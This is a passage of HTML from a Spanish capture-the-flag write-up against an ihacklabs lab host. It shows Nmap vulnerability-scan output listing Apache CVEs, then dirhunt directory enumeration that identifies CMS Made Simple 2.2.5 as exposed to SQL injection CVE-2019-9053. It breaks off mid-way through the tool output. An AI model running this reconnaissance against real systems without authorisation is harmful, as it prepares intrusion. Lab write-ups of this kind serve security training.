font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2018-17199</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2018</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1333</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2018-1333</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">9798</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-9798</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">7659</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-7659</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2017</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">15710</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">5.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2017-15710</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">0197</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4.9</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-0197</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2019</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">10092</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4.3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2019-10092</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">| </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2018</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">11763</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">4.3</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2018-11763</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">|_ </span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CVE-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">2018</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">-</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1283</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3.5</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//vulners.com/cve/CVE-2018-1283</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Service </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Info</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">OS</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: Linux; </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">CPE</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">cpe</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:/</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">o</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">linux</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:linux_kernel</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Service detection performed. Please report any incorrect results at </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">https</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//nmap.org/submit/ .</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Nmap </span><span style="color: #ffffaa; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">done</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">: </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> IP address (</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> host up) scanned in </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">161.87</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> seconds</span></p></td></tr></tbody></table></div><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Observamos abiertos los puertos con sus correspondientes servicios como el 22 (</span><a href="https://es.wikipedia.org/wiki/Secure_Shell" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">ssh</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) y 80 (</span><a href="https://es.wikipedia.org/wiki/Protocolo_de_transferencia_de_hipertexto" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">http</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">) con posibles vulnerabilidades.</span></p><br /><br /><br /><br /><br /><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-family: Arial; font-size: 12pt; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; vertical-align: baseline; white-space: pre-wrap;">{0x3} Enumeración</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: justify;"><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Nos centramos en el servicio </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">http (80)</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> enumerando directorios accesibles con la herramienta </span><a href="https://github.com/Nekmo/dirhunt" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">Dirhunt</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y detectamos que hospeda </span><a href="http://dev.cmsmadesimple.org/project/changelog/5657" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">CMS Made Simple Version 2.2.5 - Wawa</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> . Con una posible vulnerabilidad crítica de inyección SQL con el ID </span><a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9053" style="text-decoration-line: none;"><span style="color: #1155cc; font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 700; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space: pre-wrap;">CVE-2019-9053</span></a><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> que fue puesta en conocimiento el </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">23/02/2019</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> y que el fabricante actualizó confirmando el </span><span style="font-family: Arial; font-size: 11pt; font-style: italic; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6/03/2019</span><span style="font-family: Arial; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span></p><br /><div align="left" dir="ltr" style="margin-left: 0pt;"><table style="border-collapse: collapse; border: none;"><colgroup></colgroup><tbody><tr style="height: 0pt;"><td style="background-color: #333333; overflow-wrap: break-word; overflow: hidden; padding: 5pt 5pt 5pt 5pt; vertical-align: top;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">root@</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">1</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">v4n:~/CTF/hc0n2020# dirhunt http:</span><span style="color: #888888; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">//preq02.ihacklabs.com/index.php</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"><br /></span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">Welcome </span><span style="color: #fcc28c; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">to</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> Dirhunt v0.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">6.0</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;"> using Python </span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">3.7</span><span style="color: white; font-family: Consolas; font-size: 11pt; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline; white-space: pre-wrap;">.</span><span style="color: #d36363; font-family: Consolas; font-size: 11pt; 